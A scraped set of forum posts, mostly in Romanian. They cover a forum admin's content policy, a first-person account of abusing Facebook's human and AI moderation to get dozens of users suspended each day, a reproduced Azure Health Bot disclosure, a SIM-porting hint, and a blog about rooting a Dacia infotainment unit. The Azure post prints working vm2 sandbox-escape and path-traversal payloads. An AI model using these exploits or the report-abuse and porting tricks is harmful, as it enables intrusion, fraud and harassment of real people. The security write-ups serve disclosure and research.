  12. Nu a picat atunci, nici macar nu a fost acela cazul. A picat incet, cu timpul, din motivele enumerate aici si in alte topicuri. Trebuie sa fim putini atenti in legatura cu continutul. Adica eu sai fiu. Nu pot lasa sa se posteze CC-uri, DB dumps si alte balarii, in primul rand ca nu sunt utile oamenilor cu moralitate, care nu si-ar vinde familia pentru bani si care prefera sa faca un ban cinstit, dar si pentru ca eu as avea probleme din cauza unor ratati. Dar permitem continutul "greyhat". La urma urmei sunt pentester de multi ani, gasesc si exploatez vulnerabilitati (chestiile alea pentru care unii numiti pe aici "hackeri", pentru a le exploata, descarca exploit.py si ruleaza). Apoi, acum mult ani am prezentat la Defcon o aplicatie "NetRipper" care intercepteaza trafiul browserelor - nu as zice ca e in zona "whitehat". Pana la urma totul se reduce la cum iti folosesti skill-urile. pe principiul clasic in care ai un cutit, poti face un beef wellington sau poti face buzunare. Cat skill necesita fiecare astfel de actiune? Depinde de la un caz la altul. Eu vad forumul ca pe locul care m-a ajutat sa ajung unde sunt. Nu am Lamborghini si nici nu am nevoie de el, am insa destul sa imi fac toate poftele, sa pot pleca oriunde in lume cand vreau, sa fac cam ce imi doresc. Si educatia de a face totul legal mi-a fost formata pe forum. E datoria mea morala sa duc mai departe aceasta mentalitate si sa ii ajut pe altii sa faca la fel. De aceea forumul este inca in picioare si va mai fi aici. Daca sunt persoane care merg pe calea gresita, e un risc pe care si-l asuma. Sunt din Valcea, am trait anii Ebay, am vazut masini scumpe pe strada dar si cum ulterior s-au golit strazile. Stiu cat de "skilled" sunt oamenii care faceu astfel de mizerii pentru ca am cunoscut mai multi, nu stiau sa faca o pagina de phishing dar aveau lanturi de aur la gat. Apoi poze in duba, cu catuse. Nu am vrut sa fiu asa si nu vreau nici ca altii sa fie asa. Daca topicuri precum acesta par sa fie caterinca si va intrebati "Vai, dar ce mizerie, cum sa intre lumea pe forum?" - aducati-va aminte unde suneteti - tocmai pe topicul de caterinca. Daca voi va credeti mai destepti, nu sunteti. Pentru ca sunteti aici. Pana la urma cred ca RST a fost un forum de caterinca facuta de oameni cu cunostiinte in InfoSec care ocazional se mai ajutau intre ei pe aceste subiecte.
    6 points
  13. Ceea ce voi scrie acum a fost testat in the wild just for fun. Cea mai mare parte din metodele prezentate in aceasta postare nu mai sunt de actualitate, dar voi semnaliza corespunzator ce mai functioneaza si ce nu. Prima parte descrie cat de cat partea tehnica, dar pentru cine vrea sa citeasca doar partea amuzanta poate sa scrolleze pana la "partea fun". Sistemul de moderare este compus din doua entitati: moderatorii umani si AI-ul. Ambele entitati aveau niste hibe foarte mari de care m-am folosit pana s-a schimbat intregul lor sistem de moderare. Fiind o companie mare apar periodic tot felul de schimbari, unele dintre ele rezolvand fara intentie anumite probleme. Problema cu moderatorii umani: sunt colaboratori de pe toata planeta cei mai multi sunt recrutati pentru o perioada scurta de timp (4-12 saptamani) majoritatea celor care modereaza nu cunosc limba romana si folosesc servicii de traducere pentru moderare in general moderatorii folosesc Google Translate, si, probabil, unii folosesc sistemul de traducere proprietar de la Facebook serviciile de traducere, oricare ar fi ele, nu ofera intotdeauna un context corect si de multe ori nici traducerea corecta a lucra pentru Facebook inseamna a urma proceduri si a urma regulile impuse de companie fara a te putea abate de la ele, chiar daca observi ca se intampla lucruri aberante din cauza lor Problema cu AI-urile Facebook: AI-ul proprietar pentru traducere era praf la limba romana la fel ca si alte LLM-uri, mai intai traduce din romana in engleza textul, apoi analizeaza traducerea in engleza pentru a decide daca textul respecta "Community Standards" doar ca acest AI traducea mult mai prost in 2021 decat o facea Google Translate in 2015, iar contextul era total diferit in traducere decat in limba in care a fost scris nu stiu cat de bine traduce acum, tehnologia a avansat destul de mult in ultimii doi ani AI-ul de moderare: odata ce a decis ca un text incalca "Community Standards" nu cred ca isi mai poate schimba perspectiva - este necesara interventia unui operator uman pentru a schimba decizia tot un sistem automatizat de moderare se baza pe rata de succes a raportarilor, asa ca l-am violat Context: eram pe reveneala dupa problemele de sanatate, dar depresia de care tocmai scapasem ma lasase fara vlaga. Nu mai aveam tragere de inima sa fac nimic, la munca eram praf, rotitele creierului ruginisera, sistemul meu dopaminergic dormea pe el. Asa ca am zis sa revin pentru o perioada la vechile indeletniciri si sa fac tot posibilul sa ma distrez macar. Deci, trolling pe net. Unde? Pe Facebook, unde sunt toti prostii. Daca sunt atatia prosti, tocmai eu se lipsesc? Mi-am gasit si partener, un prieten care toata ziua statea la munca pe telefon, si am dat drumul la treaba. Atunci cand trollezi primesti o gramada de injurii si reclamatii. Am trecut prin cateva suspendari ale contului pana am invatat la ce este sensibil sistemul de moderare. Dar cea mai interesanta parte a fost cand m-am prins ca unele decizii se iau automat, iar unele reguli pot fi abuzate chiar daca moderatorii umani sunt cei care investigheaza reclamatiile. Ce am facut mai departe? Am citit Community Guidelines si Community Standards ca sa aflu ce tip de reclamatii au cea mai mare sansa de succes si m-am apucat de teste. Acestea au fost cele mai utile pentru ce a urmat: nudity (impact major) nu publicati pe Facebook poze cu bebelusi dezbracati harrasement (impact major) acest report reason a fost vedeta - va explic mai jos cum il foloseam violence (impact major) si acest report reason putea fi abuzat cu usurinta cand reuseam sa enervam oamenii si sa ii facem a ne ameninte unauthorised sales (impact mediu) cu acest reason am facut ceva curatenie in cateva grupuri pe care se vindeau cai, gaini, porci, animale de companie hate speech (impact mic) ii cam doare la banana pe cei de la Facebook de hate speech in limba romana bullying (impact mic) in schimb functiona de minune reportul cu reason "hartuire", cu toate ca tot ce se incadra la hartuire se incadra si la bullying sexual activity (impact mic) trebuia sa faca cineva o remarca ce tenta sexuala - ex: caut si eu o domnisoara tinerica pentru a face dragoste toata noaptea cu ea in schimb injuraturi ca "fa, daca te prind te fut" nu erau pedepsite cand faceam teste, decat daca se foloseau "violence" sau "harrasement" ca report reason Legenda: impact major - sanse mari sa fie penalizat cel raportat (peste 80%) impact mediu - sanse medii sa fie penalizat (intre 50% si 70-80%) impact mic - sanse mici sa fie penalizat, dar totusi exista o oarecare sansa Urmatoarele sunt si acum puse la misto in lista de raportari (cel putin in Romania): fraud or scam nici in ziua de azi nu am vazut sa aiba vreun efect, nici chiar atunci cand sunt sute de reporturi reale intr-o zi nu cred ca mai au destui operatori umani care sa investigheze aceste reporturi, asa ca le ignora mocking victims am testat intensiv cateva zile - nu le pasa iata ce postam cu diverse conturi: am fost violata, mama a fost violata de Securitate in fata mea, bunica mea a fost in lagarele naziste, am fost batut de tatal meu toata copilaria. Apoi lasam cu alt cont de-al meu comentarii pline de dispret la adresa victimei (ai meritat, sper sa mai patesti asta din nou etc), apoi raportam comentariul respectiv. Zero efect. Ii raportam si pe alti bagatori de seama care isi bateau joc. Nimic. cred ca este pus acolo doar din motive legale, sau functioneaza insa ignora reporturile din unele tari false information sunt 100% sigur ca reporturile pentru false information nu au efect - e pus acolo doar din motive legale acea notificare cu false information care apare sub postari se datoreaza trusturilor media, sau unor entitati influente care semnalizeaza dezinformarea spam un singur report nu face diferenta - conturile vechi raportate pentru spam nu par a pati mare lucru (posibil sa ma insel) bullying inainte avea un impact mic, acum sansele sa aiba efect un report pentru bullying sunt derizorii In sfarsit, partea fun. Pusi pe șotii, am inceput sa punem in aplicare teoriile pe care le aveam. Intre timp au mai aparut inca doua persoane in gasca noastra de trolli. Scopul era unul singur: sa bagam zilnic cat mai multe persoane in "facebook jail", adica sa fortam sistemul sa le suspende contul pentru o perioada de timp. Pentru cine nu stie, sistemul de penalizare de pe Facebook creste durata pedepselor chiar si pana la 3 luni. In unele cazuri am reusit sa "convingem" Facebook sa stearga cu totul conturile raportate de noi, dar in general, era foarte greu sa ajungem la nivelul ala si necesita multa manipulare pentru a enerva din nou si din nou acea persoana. Victimele le agatam prin trolling. Noi trollam, cativa destepti erau ofuscati si se luau de noi. Dupa care se intamplau urmatoarele: Report reason -> harrasement In momentul asta ii faceam report cu motivul hartuire la ultimele doua comentarii in care mi-a dat tag. Sansele de reusita erau de peste 90%. De ce? Pentru ca in categoria hartuire intra si asta, citez: "Repeatedly contacting a person who doesn't want to contact". Bun. Pare simplu. Este intr-adevar, dar asta nu este tot. Daca ii repetam de mai multe ori sa nu imi mai dea tag si sa nu ma mai contacteze si o faceam sa intre in jocul meu, se adunau 6-7 taguri. Dupa care incepeam sa le raportez pe toate. Cel mai probabil primea pedeapsa pentru 4-5 dintre ele. Asta inseamna ca din start contul respectiv ajungea sa fie suspendat pentru mai mult timp, nu doar pentru una sau trei zile. Partea interesanta este ca atat AI-ul cat si operatorii umani faceau aceeasi eroare. AI-ul pentru ca asa a fost calibrat, iar operatorii umani pentru ca sunt obligati sa respecte procedurile si regulile chiar daca in anumite situatii, cum e cea de mai sus, era aberant sa le respecte. Pe langa faza cu raportarea pentru taguri mai foloseam destul de des si raportarile pentru expresii uzuale din limba romana. Daca cineva ne spunea "du-te si arunca-te in Dambovita", sau "du-te si spanzura-te" puteam sa raportam pentru hartuire sau pentru violenta. In cele mai multe cazuri aveam succes. Metoda a functionat mai mult de un an. Cred ca la un moment dat un sefulet de departament de la Facebook le-a transmis superiorilor ca 3 cretini profita de procedurile lor ca sa suspende conturile userilor. Impact: fiecare dintre noi suspendam intre 40 si 70 de conturi pe zi, de multe ori fiecare dintre ele primind mai mult de o singura pedeapsa in acea interactiune cu noi. A fost cel mai amuzant abuz, dar stati sa vedeti ce a urmat si cat de retardati au fost cei care au gandit urmatorul sistem. Rata de succes a raportarilor Si daca aveati impresia ca scaparea de mai devreme a fost penibila, hai sa va spun ce s-a intamplat cand am capatat o rata de succes atat de mare la raportari. Cumva am capatat un nivel de incredere atat de mare, incat daca raportam pentru hartuire un comentariu inocent de tipul "salutare grup", existau sanse mai mult decat rezonabile ca acel user sa fie pedepsit de sistem pentru hartuire. Daca facea apel la decizie scapa de pedeapsa, dar unii dintre sarmani nu stiau ca pot face apel. La mai multe apeluri pierdute de noi parea ca ne pierdeam si din nivelul de incredere si din super puteri. Era un du-te vino in care ba aveam super puteri, ba nu le mai aveam si munceam sa le recapatam. Pentru a ajunge la acest nivel de incredere era nevoie de 3-4-5 zile in care sa folosim intensiv metoda "nu imi mai da tag" (o faceam cam 7-8 ore pe zi), iar apoi capatam aceste super puteri. Daca nu mai intram pe Facebook o saptamana o luam de la zero. Foarte dubios sistemul. A functionat doar cateva luni, dar a fost amuzant cand ii pedepseam pe cei mai vocali comentaci si admini de pe anumite grupuri. Nimeni nu mai intelegea ce se intampla, dar stiau ca suntem noi de vina. Report reason -> any-> dumb Translator Intr-o zi incercam sa ii agit pe niste bosorogi de pe un grup plin de iubitori ai lui Ceausescu si m-am gandit eu, ca baiatul destept La cateva minute dupa ce am postat ma arde tot pe mine Facebook cu o suspendare de 7 zile pentru hate speech. Fac apel. Dupa mai putin de un minut primesc rezultatul apelului. Hate speech. Clar m-a ars AI-ul care a tradus textul meu. Iau textul, il postez in alta parte de pe alt cont de tavaleala cu optiunea de traducere automata in engleza. Mda. Ce am scris eu si ce a tradus imbecilul nu avea nici o treaba. Aia e. Am facut pauza de la Facebook. Intre timp mi-am setat toate conturile sa traduca automat postarile din romana in engleza. Cum vedeam ceva tradus prost, cu potentialul de a fi gresit interpretat, cum ii dadeam report. A mers binisor, dar prea rar dadea rateuri atat de mari si interpretabile precum a dat in cazul meu. Inca mai functioneaza, dar dupa cum ziceam, cam rar apare oportunitatea de a incalca Community Standards din cauza traducerii eronate. In afara de asta sistemul de moderare este in clipa de fata aproape inexistent. Report reason -> unauthorised sales Stiati ca nu este permisa pe Facebook vanzarea de caini, pisici? Sau de porci? Sau de cai, capre, oi, miei si alte animale, fie ca sunt salbatice sau domestice? Eh, inainte de a renunta Facebook la armata de moderatori puteam intra pe grupurile unde se vindeau cai si porci si ii raportam pe toti vanzatorii. Nici cei care vindeau pentru consum animale sacrificate nu scapau. Important era sa existe atasate la postare poze cu animalul sacrificat. Rata de succes era bunicica, pe la medie, dar totusi apropiata de o rata mare. Cum zice Lenghel, spre zona verde. Imi aduc aminte ca in 2022, in perioada Pastelui, pe un grup dedicat au avut conturile suspendate aproape toti cei care vindeau miei sacrificati. La un moment dat toate metodele au picat. Nu mai au destui moderatori, iar AI-ul lor este setat sa nu mai bage in seama majoritatea raportarilor. Ba mai si trimite cateodata mesaj ca nu sunt destui moderatori care sa se ocupe de reporturi din cauza Covid-19. In 2024. A fost util si amuzant, dar foarte obositor in acelasi timp. Acum sa vedem cum sta treaba cu Reddit. Acolo se fac bani Spor.
    6 points
  14. We have discovered multiple security vulnerabilities in the Azure Health Bot service, a patient-facing chatbot that handles medical information. The vulnerabilities, if exploited, could allow access to sensitive infrastructure and confidential medical data. All vulnerabilities have been fixed quickly following our report to Microsoft. Microsoft has not detected any sign of abuse of these vulnerabilities. We want to thank the people from Microsoft for their cooperation in remediating these issues: Dhawal, Kirupa, Gaurav, Madeline, and the engineering team behind the service. The first vulnerability allowed access to authentication credentials belonging to the customers. With continued research, we’ve found vulnerabilities allowing us to take control of a backend server of the service. That server is shared across multiple customers and has access to several databases that contain information belonging to multiple tenants. Vulnerabilities Reported Multiple sandbox escapes, unrestricted code execution as root on the bot backend Unrestricted access to authentication secrets & integration auth providers Unrestricted memory read in the bot backend, exposing sensitive secrets & cross tenant data Unrestricted deletion of other tenants' public resources The Discovery The initial research started at the Azure Health Bot management portal website. Skimming through the features available, we saw that it’s possible to connect your bot to remote data sources, and also provide authentication details. Since customers would likely connect their bot to 3rd party data, such as patient databases, appointment calendars, and so forth, it’s a very interesting target for an attacker. It’s unlikely to imagine a scenario where the customers wouldn’t want to connect the bot to their data. After fiddling with this feature, we noticed something interesting in the request that retrieves our data connection details and auth secrets. This is what a regular request looks like: https://portal-eastus.healthbot.microsoft.com/v4/test-301x6x6/integration/data-connections/1679070537717/ In this URL, “test-301x6x6” is our unique health bot instance ID, and “1679070537717” is the ID of the unique data connection we created. The response to this request was the following JSON: { "odata.metadata": "https://hbstenant2steausprod.table.core.windows.net/$metadata#test301x6x6/@Element", "etag": "W/\"datetime'2023-03-17T17%3A08%3A44.7784337Z'\"", "partitionKey": "DataConnection", "rowKey": "1679070537717", "timestamp": "2023-03-17T17:08:44.7784337Z", "type": "custom", "name": "test data connection", "description": "desc", "base_url": "https://website.com/a", "auth_provider": "", "static_parameters": "[{\"type\":\"header\",\"key\":\"Test\",\"value\":\"true\"}]" } People familiar with Azure will recognize this as an Azure Table API response. And it makes sense, the service stores our connection data in the Azure Table service, and it pulls that data directly from there. Our intuition was to start toying with the ID number of our data connection. We believe that the data connections of all customers are in the same table, and if we can query whatever ID we want from the table, we can view the data connections of other customers. Per the Azure Table API documentation, here’s how a request to retrieve data from a table looks like: https://myaccount.table.core.windows.net/tableName(PartitionKey='<partition-key>',RowKey='<row-key>') So here we have 3 variables we must fill: table name partition key row key We have all the required variables since the previous Table API response discloses all that information. Our guess was, that was the URL the backend server uses to get the information behind the scenes: https://hbstenant2steausprod.table.core.windows.net/test301x6x6(PartitionKey=’DataConnection’,RowKey=’1679070537717’) Here you can see: hbstenant2steausprod - the account name Microsoft used for storing the data. test301x6x6 - our Azure health bot instance ID. This is not a secret. (PartitionKey=’DataConnection’,RowKey=’1679070537717’): Pulling DataConnection with the ID from the request. The input in our control is the ID. The idea was to send an ID that would allow us to “break out” of our tenant and read other tenants' data. How do we do that? Since it’s all appended to a URL, the idea was to leverage URL traversal to cancel out the prepended information added by the server, and then add our own: GET /v4/test-301x6x6/integration/data-connections/%2F..%2FotherTenant(PartitionKey='DataConnection',RowKey='1679126391688/ As you can see, we encoded the slashes (%2F) which were injected into the URL, effectively turning the request into: https://hbstenant2steausprod.table.core.windows.net/test301x6x6(PartitionKey=’DataConnection’,RowKey=’1679070537717/../otherTenant(PartitionKey='DataConnection',RowKey='1679126391688') And voila! This request successfully returned the connection data of the other tenant. ‍ Hacking The Bot Backend - 3 ways to pwn the Node.js vm2 sandbox ‍ Exploring further into the service, we saw that you can execute your JavaScript code in an isolated environment. This feature lets you process data coming from the chat as part of the conversation with the end customer. We started by doing simple JS recon inside the sandbox - looking at global variables, we figured we were running inside a vm2 sandbox, a popular Node.js sandboxing library that has since been discontinued due to multiple, unrelated security flaws. The goal was simple: to be able to execute shell commands and try to find a way to access cross-tenant data. How do you usually execute shell commands with Node.js? Simple, you import the child_process module and call exec/execSync: require('child_process').execSync('id') ‍ But you didn’t think it’d be that easy, did you? In general, require inside the vm2 sandbox is a patched version that doesn’t let you import anything harmful. However, Microsoft wanted to provide a few standard modules to make your life easier. So what we have is a custom require function, which has a very specific whitelist of boring modules. But we wanted to understand what’s going on under the hood. Lucky for us, Javascript lets you view the source code of any function. You call .toString() on the function, and voila, you get the source code: (packageName) => { // Do binary search in the allow list of packages if (packagesAllowedList && _.indexOf(packagesAllowedList, packageName, true) < 0) { throw new Error(`**Usage of the '${packageName}' package is not allowed. Please contact your system administrator**`); } return require(packageName); } Looks pretty harmless at first glance. It’s a simple check if the required module is in the whitelisted array, and if it is, the original Node.js require function will be called. Well, if you look closer, they called _.indexOf() instead of the native array indexOf function for some reason. And _.indexOf() is a function from the underscore module. Which is whitelisted. Can you see where we’re going with this? Bypassing the whitelist and achieving remote code execution is no problem when you can just override the indexOf function, which is conveniently already present as a global, you don’t even need to import it. underscore.indexOf=function(){ return 10; }; // Always return 10 - bypass the if condition require('child_process').execSync('id') // Code executed! And then: ‍ Since that backend is shared, we were running as root inside a server that processed the chats of other customers. All research was done in the “debug” environment and was done carefully to not expose any sensitive information. Microsoft quickly patched the bug within 24 hours, but we’re not done with this sandbox yet. ‍ Underscore strikes again After Microsoft patched the require() flaw, we dove deeper into understanding the mechanics of the vm2 sandbox. We knew that the modules that are whitelisted are part of the unisolated Node.js root context, the idea was to look into each module individually and try to find interesting functionalities that can be abused. We spent a few hours reading the documentation and code of all whitelisted modules, most of them were just boring data parsing libraries that didn’t help. But then something in Underscore.js caught our attention: Hmm, a function that compiles JavaScript templates, with an arbitrary code execution feature. We’re sensing a pattern here. To understand why it’s interesting, you need to understand a simple concept of how the vm2 sandboxing works. In simple terms, they create a “bridge” between the sandbox and the host, and everything you execute inside the sandbox goes through proxy functions which restrict what you can do to a very limited set of features. For example, if we try to access the Node.js global “process” variable from within the sandbox, the variable won’t be found as it’s not part of the sandboxed context. However, when you pass down functions from the root context to the sandbox, the code is already “compiled”. It’s usually pretty dangerous since code inside the sandbox can tamper with the modules and cause unexpected behavior outside the sandbox. Back to the template function, since the underscore module was passed down from outside the sandbox, the code will be compiled in the non-sandboxed context, therefore, we can achieve code execution simply: let foo = underscore.template("<% print(this.process.mainModule.require('child_process').execSync('id')) %>") Microsoft quickly patched this as well, and we move on to the final flaw. ‍ A Distant Memory This time we had to think a little bit “outside the box” since we were running out of interesting features in the whitelisted modules. We looked into the “buffer” module which is a built-in Node.js module. The thing that caught our attention was “Buffer.allocUnsafe”. This function lets you allocate an uninitialized memory buffer. To explain what it means in simple terms, let's compare Buffer.alloc and Buffer.allocUnsafe: Buffer.alloc: will provide a memory buffer that is zeroed out. If we try to read from the allocated buffer, we’ll get a bunch of zeroes. Buffer.allocUnsafe: faster than alloc, will provide a memory buffer that hasn’t been zeroed out. That means that if the memory allocated was previously used for an HTTP request for example, we will be able to see the HTTP request by reading from the newly allocated buffer. This is pretty dangerous since if we can use allocUnsafe inside the sandbox, we might be able to access sensitive info from the memory of the application. The vm2 developers were aware of this and restricted the use of Buffer.allocUnsafe. Since the entire buffer module was whitelisted, we had access to SlowBuffer, which is the same as allocUnsafe. This one was not restricted by the sandbox, since it’s not supposed to be there by default: buffer = require('buffer') p = new buffer.SlowBuffer(10024) p.toString() // returns “dirty” uninitialized memory previously used in other areas of the app Running this code a few times yielded interesting data from the application, for example, a few JWT secrets for internal Azure identities, Kubernetes API calls, cross-tenant data, and more. After that, Microsoft made multiple important security changes: They had changed the service architecture to run a completely separate ACI instance per customer. Making any future sandbox breach irrelevant. They changed the sandboxing from vm2 to the isolated-vm library, which uses V8 isolates, a much better and more secure solution. ‍ Final Words This marks the first publication from Breachproof. We aim to publish a lot of more quality research that has real impact. Much more is coming. If you're a company dealing with sensitive data and need help securing it - feel free to contact us. Authored by Yanir Tsarimi Bounty 203,000 $ Source: https://www.breachproof.net/blog/lethal-injection-how-we-hacked-microsoft-ai-chat-bot ‍
    6 points
  15. Chiar ma bucur, companiile de telecomunicatii sunt prea imbarligate si varza. Vodafone next ? Astept sa vina Starlink cu telefonie mobila si fac mutarea, de-abia astept sa scap de fosilele astea care au monopol pe piata si ofera servicii de cacao. In telecomunicatii un Senior Security Engineer ia intre 12000 si 15000 de lei maxim, pe langa low-ball-ul asta nesimtit mai ai si patru manageri deasupra, mai trebuie sa lucrezi si cu toate borataniile de toate natiile. Mergeti de curiozitate la orice Orange Shop si spuneti-le ca vreti sa portati o cartela PrePaid (dati numarul unui prieten) si ca aveti nevoie de seria de la cartela. Cu seria de la cartela va duceti la Vodafone si faceti cerere de portare, oare ce se intampla dupa? //Later edit, se pare ca si-a luat un fraier de la ei stealer, au ajuns baietii in Jira si de acolo a fost poveste, la mai multe.
    5 points
  16. How I Also Hacked my Car 2024-01-30T22:14:07+00:00 • goncalomb • hacking,car,dacia,rpi This blog post is kind of inspired by another that I saw on HN some time ago, "How I Hacked my Car". After praising the infotainment system of the car, a Hyundai IONIQ, the author ends up hacking it and running custom software on the head unit. Well, my much cheaper 2023 Dacia Sandero also has a decent infotainment system with navigation and wireless Android Auto. Even before I got the car, I searched around to see if the system was hackable. I was not surprised to find that a simple USB drive with an autorun.sh script gets run as root. A classic. Various forums around the web use this method to change skins and side-load navigation maps. I was not interested in that, my goal was also to run some custom software. Well, there is more to the story, otherwise, I would just that autorun.sh "feature". The Infotainment System The system is a MediaNav Evolution from Renault (which Dacia is a subsidiary of), built by LG (FCC ID: BEJLAN5900WR). It's a Linux box. Over the years there have been various iterations of this system, the older devices used WinCE. The navigation part of the software is by a company called NNG (iGO?). Apparently, they provide navigation software for many other devices. MediaNav Evolution (unofficially called MediaNav 4) The autorun.sh Just by looking around on various forums, I knew of 3 special files that when placed on a USB drive would trigger some debug functions: autorun_bavn/autorun.sh: a script that gets run as root logfiles_bavn: a directory that gathers various system logs and files usb_logging: a directory where the system continually dumps dlt files (proprietary log system) One good thing about the log files is that they contain the Wi-Fi password for the AP. This password can be reset on the UI, but it's never visible. Knowing the password allows other devices to connect to it (e.g. PC). When using wireless Android Auto it connects automatically, I think it bootstraps using Bluetooth. I was most interested in the autorun.sh... But it was not working, I couldn't get the script to run. The Firmware At this point, I decided to start inspecting the firmware to see what was wrong, and if there was another way in. My device came with version 6.0.9.9. I wanted a recent update file, but the official website doesn't provide a direct download. It requires installing a desktop application, "Toolbox", which I ended up doing. The application can be used to buy map updates or download firmware/OS updates for free. The procedure starts with collecting some information about the system/car to a USB drive. After connecting it to a PC, the "Toolbox" software detects a new update and puts the new update file on the drive. I didn't update it, I just wanted the file, it was version 6.0.10.2: >: file upgrade.lgu upgrade.lgu: POSIX tar archive (GNU) I also had an older update file, version 6.0.9.7, that I found in some random forum. Sometimes even grep can be a great analysis tool. Just by running grep -RF autorun.sh on the contents of both the new and old firmware, I could see that the new one had no matches. Time to load Ghidra and see what's going on... Version 6.0.9.7 has the autorun.sh feature, but it is not present on version 6.0.10.2 Comparing the 2 files it was evident that they had removed the autorun.sh backdoor. Even though I didn't have the specific firmware for my installed version (6.0.9.9), it was clear that mine didn't have it and that's why I could never get it to work. This miscmanager file is also responsible for the other USB debug features, these are all still there. The core OS appears to be from GENIVI/COVESA (GitHub: GENIVI/COVESA). I'm not familiar with these systems at all. They have a fair bit of open-source stuff that will probably explore in the future. I decompiled other binaries to try to look for some other interesting stuff. Found a lot of D-Bus stuff, that will be useful for getting vehicle information when I can run my own software. But my goal was to get root access first. One way would be to craft a new update file with a backdoor, which would require reverse engineering the whole upgrade procedure, and as expected the update files do have some signature hashes that presumably need to match. Getting root access directly would be the preferred way. The Android Update App Something I noticed on the official website was that they were promoting a new way to update the maps, using an Android phone app. Could this be my way in? The description on Google Play promises to "Eliminate the Sneaker Network", an expression that I had never heard, in reference to not requiring a USB drive. Of course I didn't install it, there is no point in that. I just searched the id com.nng.pbmu.dacia on Google to find one of the many sites that offer the .apk file for download. I'm not an Android developer, I just know that deep inside there is some bytecode that traces its root back to Java, and I know Java. I don't care about Dalvik, ART, Zygote, or whatever. Just give me those Java classes. Over the years I've decompiled a few Android apps, my preferred way is just to unpack the .apk as a .zip (that's all it is), get the .dex bytecode files, run them through dex2jar to get some .jar files and open them with good old JD-GUI. Recently I've discovered jadx which provides a better experience for decompiling apps. To my surprise the app was quite complex, it appears to include some sort of native bindings, and most of the functionality is implemented in some kind of proprietary .xs scripts (similar to JavaScript). These are found on the app's resources. Android APIs are exported as modules to be used in the .xs scripts Several native libraries and .xs scripts It appears that the liblib_nng_sdk.so library is responsible for running these scripts, but I didn't explore it further. My goal was just to focus on what kind of protocol was used to update the maps on the device. And I found it in the file nftp.xs. NFTP!? Is it standard FTP? No, it's not standard FTP or any other known protocol that I could find. It's a new binary protocol for transferring files, implemented on these .xs scripts. The app then uses Android Open Accessory (AOA) as the transport layer for the protocol. AOA was totally new to me, but after some reading, it was clear that it is just a way of establishing a standard for an accessory to talk USB with an Android device. The names are confusing, the "accessory" is actually the USB host (in this case, the head unit) and the Android device is the USB peripheral. The Other Side The new update file that I had was version 6.0.10.2, which, according to the website, was the version required for the new update app to work. That naturally means that there is some specific service/code on that file to handle the update on the head unit side. After some digging, I found it. It's another set of .xs scripts, these run on a native interpreter. There is also a native binary, aoa2sock, that bridges the gap between USB (AOA) and the .xs scripts by providing a pipe for the transfer protocol. It's clear that this phone update feature is an afterthought, the binaries/scripts are not part of the standard upgrade filesystem, they are installed separately from a .ipk package file (yellowtool.ipk) when the system is updated. The internal name they use is YellowTool / YellowBox. And this is the only part of the entire system that is coded with these .xs scripts, everything else is just native binaries. Most of the system uses native binaries and Qt applications The mobile update app feature uses .xs scripts Being plain text scripts, it was relatively easy to understand what the protocol does and what kind of access it provides, even though the coding style is atrocious. Constructing The Backdoor At this point, just by reading the code, I was pretty sure that it was possible to write arbitrary files under the /navi directory, and that would give me full access if I carefully modified some files. I just needed to create a fake Android update app and connect using AOA. Well, as I said before, I'm not an Android developer, so I went with the next best thing, the Linux Kernel. As it turns out I'm also not a kernel developer... But I knew that it has something called gadget mode, where a device running Linux can act as a USB peripheral (instead of a host). Could I make a Raspberry Pi act as an Android device in AOA mode? Gadget mode can be configured from userspace using configfs (just by writing specific /sys/kernel/config/ files), this way does not require writing any kernel code, but it's limited to specific "functions" already implemented in the kernel (e.g. serial port, mass storage, ethernet adapter etc). Not unsurprisingly, that's how the guys at Google implemented AOA, they added a new "accessory" function to the kernel. They even tried to push it upstream, but it went nowhere, currently, it's not part of the Linux Kernel. I don't think it will ever be, it's probably too specific, and it's kind of a weird protocol. After reading more about AOA, it was clear that it involved a kind of handshake where the accessory asks the Android device for AOA, and after that, the device just acts like a serial port (a "raw" data pipe), and it's up to the developer to do the rest (this is a simplification, and there are other modes, read more). So maybe I could use the serial gadget function to fake an Android device already in accessory mode, without implementing the handshake. I also found the talk where they first announced AOA, back in 2011. It's a nice talk if you are into USB stuff: The Testing Setup The system is something like this: Android side: Update App / "nftp" (.xs scripts) <=> AOA <=> USB Head unit side: USB (host) <=> aoa2sock <=> "nftp" (.xs scripts) <=> [reads/writes system files] For testing, I used 2 Raspberry Pies. Because the head unit is ARM-based as is the Raspberry Pi, I was able to run the aoa2sock binary and .xs interpreter from the firmware, this simulated the head unit and acted like a USB host. The other RPi was the USB peripheral (using the On-The-Go, OTG port), which when configured correctly using the gadget mode, acted like an Android device in AOA mode. The smaller Raspberry Pi Zero 2 W can be powered from the OTG port and will act as the Android device After messing about with multiple gadget configurations, I was seeing some promising debug messages from aoa2sock, that's the binary extracted from the firmware that creates a pipe between the USB AOA and the weird "nftp" protocol (.xs scripts), on the head unit side. But it was not working... "No AOA endpoint was found": My fake head unit was not recognizing my fake Android device >: file aoa2sock aoa2sock: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux-armhf.so.3, for GNU/Linux 2.6.32, BuildID[sha1]=XXXXXXXX, with debug_info, not stripped After inspecting the aoa2sock binary in Ghidra (thanks for the debug info) and reading the kernel code, I finally found the issue. The kernel serial port gadget uses a different USB subclass from the one used by AOA, and it can't be changed from userspace. Is this a bug? I think AOA is correct in using USB_SUBCLASS_VENDOR_SPEC for a generic interface OK... Let's patch the kernel I ended up having to download the kernel source and patch the f_serial.c gadget function to change the USB subclass. After compiling the kernel module and loading it using modprobe, it finally worked and the aoa2sock binary recognized the device. My fake Android device was finally connected to my fake head unit Can I call myself a kernel developer now? All that was left to do was to somehow recreate that "nftp" protocol. I didn't really want to use the proprietary .xs files implementation, so I wrote my own in Python. At this point, I had all the pieces and the Raspberry Pi now replaced the Android app: Raspberry Pi side: Python Script ("nftp" implementation) <=> USB Gadget Mode (emulates AOA) Head unit side (same as before): USB (host) <=> aoa2sock <=> "nftp" (.xs scripts) <=> [reads/writes system files] Creating the backdoor involved issuing "nftp" commands to edit a specific file under the /navi directory and inject a call to a bash script, this bash script (also uploaded using "nftp") contains the payload that runs as root. H4cking Time After much testing with my dual RPi setup, I was confident that it was going to work... Raspberry Pi Zero 2 W (OTG port) connected to the infotainment head unit Setting up for an update... Ready to "Update with Phone", that option is only available after version 6.0.10.2 Waiting for a phone Time to put the RPi in gadget mode (I was connected to it using SSH)... Sorry, it's not a phone and we are not sending any maps Sending and running the payload... Got it! Success! I had root access. That payload is just call to a specific D-Bus method that I found while analyzing the firmware, it shows a popup with custom text and title. The text is the output of the id command. Finally, after replacing the payload with something more useful, a simple socat bind shell and connecting back to it using Wi-Fi, I had full access. Give me that root shell 